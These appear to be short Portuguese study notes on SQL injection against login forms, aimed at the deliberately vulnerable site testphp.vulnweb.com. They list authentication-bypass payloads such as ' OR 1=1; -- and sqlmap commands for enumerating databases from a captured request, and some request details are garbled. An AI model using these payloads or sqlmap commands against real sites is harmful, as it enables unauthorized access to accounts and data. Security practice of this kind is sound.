
	---------------------------------------	          SQLinjection em formulários        ----------------------------------------------
	
	site teste: http://testphp.vulnweb.com/login.php
	
	formulário: 						injetando códigos ( aspas simples or duas aspas simples igual a aspas simples ) 
		usuário: xxx   ------------------ > 		'or''='         ' OR 1=1; --      
		login: xxx     ------------------ > 		'or''='		'=' 
										
	
	BYPASS 
	
	POST /login.php /HTTP1.1		-- > 	sqlmap -r header.txt --forms --dbs --dbms=(nome da linguagem do banco de dados) 
	Host: url do site
	User-Agent: xxxxx
	Cookies: xxxxx
	Content-Type: text/html; charset=UTF-8
	POST /login.php HTTP/1.1
	csrf-token 
	
	sqlinjection sem precisar passar um header: 
	sqlmap -u site --forms --dbms=(nome do banco de dados) --dbs 
	Fazendo requisição de SQLinjection na prática em formulários:
		- >  SELECT * FROM Users WHERE usuario = 'teste@teste.com'-- AND password = 'senha';
	
	Com injeção: 
		- > usuario: teste@teste.com'-- 
	Como seria a requisição com injeção: 
		- > SELECT * FROM Users WHERE usuario = 'teste@teste.com''--;
		( AND passowrd é comentado pelo -- 
